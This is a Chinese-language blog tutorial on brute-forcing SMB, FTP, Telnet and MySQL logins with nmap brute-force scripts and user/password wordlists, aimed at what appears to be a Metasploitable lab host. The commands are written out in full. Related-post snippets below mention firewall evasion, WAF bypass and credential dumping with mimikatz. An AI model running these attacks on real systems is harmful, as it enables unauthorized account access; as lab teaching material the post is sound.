nmap mysql爆破_关于Nmap的简单爆破

最新推荐文章于 2024-04-11 00:54:04 发布
最新推荐文章于 2024-04-11 00:54:04 发布
阅读量1.7k 收藏 8
点赞数 2
文章标签: nmap mysql爆破
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42316909/article/details/113891298
版权

首先我们来对目标系统进行一次简单的扫描,。以确定其开放的服务有哪些:

nmap 192.168.30.128

可以看到,目标服务器开放了众多的服务端口!

33d60d3daea44af2332bfbcfdbfd0a35.png

下面我们来对其 SMB 服务进行一个简单爆破:

nmap -p445 –script smb-brute.nse –script-args userdb=./user.txt,passdb=./pass.txt 192.168.30.128

可以看到用户名及密码均为 msfadmin !

6a079173d4492ce12752016a3dcfe4ef.png

爆破 FTP 服务密码及用户名:

nmap -p21 -sT –script ftp-brute.nse –script-args userdb=./user.txt,passdb=./pass.txt 192.168.30.128

可以看到用户名及密码均为 msfadmin !

2a596991f9be855e51b3b2b64b675e9e.png

爆破 TELNET 服务用户名及密码:

nmap -p23 –script telnet-brute.nse –script-args userdb=./user.txt,passdb=./pass.txt 192.168.30.128

可以看到用户名及密码均为 msfadmin !

452ff4f40921cdd0d83d00796974a0b7.png

爆破 MYSQL 数据库用户名及密码:

nmap -p3306 –script mysql-brute.nse –script-args userdb=./user.txt,passdb=./pass.txt 192.168.30.128

关于MYSQL的爆破,我分别在虚拟机和物理机下尝试均为成功。大致原因和我的网络环境或是软件本身有关,大家可以自己去尝试下!

a6fbddf0b21e73c0fec8f19f9cbc52e3.png

weixin_42316909
关注
  • 2
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Mysql 身份认证绕过漏洞(CVE-2012-2122)
NLXHBM的博客
04-24 2927
漏洞原理:当连接 MariaDB / MySQL 时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使 MySQL 认为两个密码是相同的。也就是说,只要知道用户名,不断尝试就能够直接登入 SQL 数据库。 修复:对数据库进行升级打补丁;在防火墙上关闭mysql端口 1.环境搭建 使用nmap扫描 使用nmap 对靶机进行扫描,查看所开放的端口,以及扫描数据库的版本信息 masscan --rate=10000 --ports 0-...
Nmap网络安全审计(六)
Jach1n
02-11 468
Nmap网络安全审计(六) Nmap脚本引擎NSE
nmap的高级使用-参数,脚本,绕过防火墙
weixin_46626737的博客
07-11 711
-script http-methods --script-args http.useragent=”Mozilla 5” 修改user-agent字段。--script-trace --script=vuln/.... 来查看发送的数据包。--script=http-methods 扫描http允许的方法。--script-help=dos 查看dos脚本的帮助文档。--script=http-brute http认证爆破。--script=http-ls 扫描http目录。
kail渗透工具之nmap的使用方法
最新发布
Idealismi的博客
04-11 348
nmap是用来探测计算机网络上的主机和服务的一种安全扫描器。为了绘制网络拓扑图,nmap的 发送特制的数据包到目标主机,然后对返回数据包进行分析。我们在192.168.80.129主机上,开启3306MySQL服务,再进行扫描IP地址,查看是否可以扫描出来。通过IP地址的扫描我们可以看到192.168.80.129主机开启的服务。主机探测、端口扫描、版本检测、支持探测脚本的编写。此时我们可以看到两台主机开启的服务以及状态均被扫描出来。6、显示扫描的所有主机的列表。1、nmap扫描工具的简介。
KaliLinux-nmap(众神之眼)高级应用-IDS与防火墙规避及漏洞利用脚本篇
易编橙 · 终身成长社群,相遇已是上上签!
03-31 2869
文章目录IDS与防火墙规避篇NSE脚本篇常用的脚本攻击案例扫描服务器常见的漏洞检查FTP是否存在匿名登陆利用DNS进行子域名暴力破解对MySQL进行暴力破解对MsSQL进行暴力破解对Oracle进行暴力破解对SSH进行暴力破解修改Nmap默认的UserAgentHTTP管道 IDS与防火墙规避篇 在实际应用场景中,Nmap提供了多种规避技巧用于IDS和防火墙的检测和屏蔽 下面是一些常用的规避方式 命令参数 参数详解 -f 将发送的检测数据包以分片碎片化的方式进行传输,用以规避IDS和防火
Nmap爆破MySQL弱口令漏洞:解决报错Accounts: No valid accounts found
mooyuan的博客
11-23 3638
nmap工具不仅仅能扫描,也可以暴力破解mysql,ftp,telnet等服务。看到这里不要怀疑,在kali系统中查一下到底支持哪些暴力破解功能,命令如下查询结果为如上查询结果包括mysql、ftp、telnet等多个服务的暴力破解。接下来就以MySQL为例讲一下如何就是用nmap进行暴力破解获取MySQL的弱口令漏洞,以及如何解决windows下小皮工具搭建的MySQL服务无法渗透成功的问题。
实训实训实训
IWANnaaa的博客
04-03 4745
1. Nmap的基本 Nmap + ip 6+ ip Nmap -A 开启操作系统识别和版本识别功能 – T(0-6档) 设置扫描的速度 一般设置T4 过快容易被发现 -v 显示信息的级别,-vv显示更详细的信息 192.168.1.1/24 扫描C段 192.168.11 -254 =上 nmap -A -T4 -v -iL ~/targets.txt (iL表示要扫描的目标位于一个文档中) --------------- 192.1...
Nmap端口扫描工具_Nmap简单命令_源码
10-04
简单总结一下上课所学,关于Nmap工具的简单命令
nmap_nse_vulscan.rar
04-01
nmap的nse漏洞扫描脚本的使用命令: 【https://github.com/scipag/vulscan】 nmap -sV --script=vulscan/vulscan.nse #使用默认的库进行漏洞扫描 nmap -sV --script=vulscan/vulscan.nse --script-args vulscandb=...
nmap_cheet_sheet_0.6.pdf
02-21
nmap cheet sheet手册 nmap是一个网络连接端扫描软件,用来扫描网上电脑开放的网络连接端。确定哪些服务运行在哪些连接端,并且推断计算机运行哪个操作系统(这是亦称 fingerprinting)。它是网络管理员必用的软件...
nmap-7.80-1.x86_64_nmap_ROOT_
10-01
linux nmap安装包
nmap_auto_analyzer
07-14
Nmap自动分析器 NmapAutoAnalyzer 是一个脚本,用于从 nmap XML 输出文件中提取特定的潜在有用信息。 当您拥有大量 nmap XML 文件并想要提取端口列表等内容以供进一步测试时,它主要是方便的。 实际解析由 nmap-...
MySQL连接密码爆破
愿路途漫长,莫失莫忘。 愿不骄不躁,安稳顺心。
09-04 253
这个的功能是和mimikatz的功能是一样的,并且可以执行mimikatz的命令,kiwi有x64和x32的,而kiwi默认是x32d的,并且需要system权限,所以我们需要改成x64的。创建成功之后,我们也成功的将我们创建的用户放入管理员组,但是,平常我们创建了用户之后,必然也不甘心就这样算了,我们要拿到管理员Administrators的账号密码,全给他拿下来是吧。提权成功之后,那肯定要创建用户吧,创建用户之后,那肯定要拿到管理员自己的账号密码吧,这样我们才能与目标机器创建好美好和谐的关系呀。
mysql nmap_Nmap简单爆破
weixin_32233079的博客
02-17 298
首先我们来对目标系统进行一次简单的扫描,。以确定其开放的服务有哪些:nmap 192.168.30.128可以看到,目标服务器开放了众多的服务端口!下面我们来对其SMB 服务进行一个简单爆破:**nmap -p445 –script smb-brute.nse –script-args userdb=./user.txt,passdb=./pass.txt192.168.30.128**可以看到用...
信息漏洞分析
qq_44790964的博客
09-23 351
常见的漏洞分析工具. NMAP AWVS Appscan Burpsuite Netsparker Jsky Safe3wvs 椰树 M7Lrv NMAP 端口扫描之王 NMAPnmap有绕过防火墙的功能) 主机探测 扫描单个主机 nmap 192.168.1.2 扫描整个子网,命令如下: nmap 192.168.1.1/24 扫描多个目录,命令如下: nmap 192.168.1.2 ...
渗透测试 ( 5 ) --- 扫描之王 nmap、渗透测试工具实战技巧合集
freeking101的博客
07-02 9643
Nmap 是一款开源免费的网络发现(Network Discovery)和安全审计(Security Auditing)工具。软件名字 Nmap 是Network Mapper 的简称。Nmap 最初是由Fyodor在1997年开始创建的。随后在开源社区众多的志愿者参与下,该工具逐渐成为最为流行安全必备工具之一,号称扫描之王。...................................................
sqlmap的使用详解(三:绕过防火墙)
→_→
10-11 2144
目录 0x01 确认WAF 0x02 使用参数进行绕过 0x03 使用脚本介绍 1 使用格式: 2 脚本总类 0x04脚本参数组合策略绕过 1 mysql绕过: 2 MSSQL: 3 ms access: 4Oracle: 5 建议: 0x01 确认WAF 首先我们判断该Web 服务器是否被WAF/IPS/IDS保护着。这点很容易实现,因为我们在漏扫或者使用专门工具来检测是否有WAF,这个检测,在nmap 的NSE,或者WVS的策略或者APPSCAN的策略中都有,我...
绕过防火墙爆破mysql_SQL注入绕过防火墙的9种基本方法
weixin_32431435的博客
02-03 664
Web应用程序防火墙(WAF)的主要作用是过滤,监控和阻止各类进出Web应用程序的HTTP流量。WAF区别于常规防火墙,因为WAF能够过滤特定Web应用程序的内容,而常规防火墙充当的则是服务器之间的安全门。通过检查HTTP流量,它可以防止源自Web应用安全漏洞的攻击,如SQL注入,XSS,文件包含和安全配置错误。WAF是如何工作的?协议异常检测:拒绝不符合HTTP标准的请求增强的输入验证:代理和服...
渗透之——Nmap+Zenmap+Amap+Zmap
热门推荐
冰河的专栏
11-18 1万+
转载请注明出处:https://blog.csdn.net/l1028386804/article/details/84204992 Nmap 第一部分 Nmap基础 一、Nmap功能 基本功能有三个:     1.探测主机是否在线;     2.扫描主机端口,嗅探所提供的网络服务     3.推断主机操作系统      主机探测:     探测网路上的主机,例如列出相应TCP和ICMP请求,i...
Nmap最新版本中文使用手册
05-16
Nmap最新版本中文使用手册是一份详尽的指南,介绍了如何有效地利用这款强大的开源网络探测和安全审计工具。Nmap,全称“网络映射器”,其核心功能是通过发送定制的数据包来扫描网络,识别网络中的主机、服务、操作...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值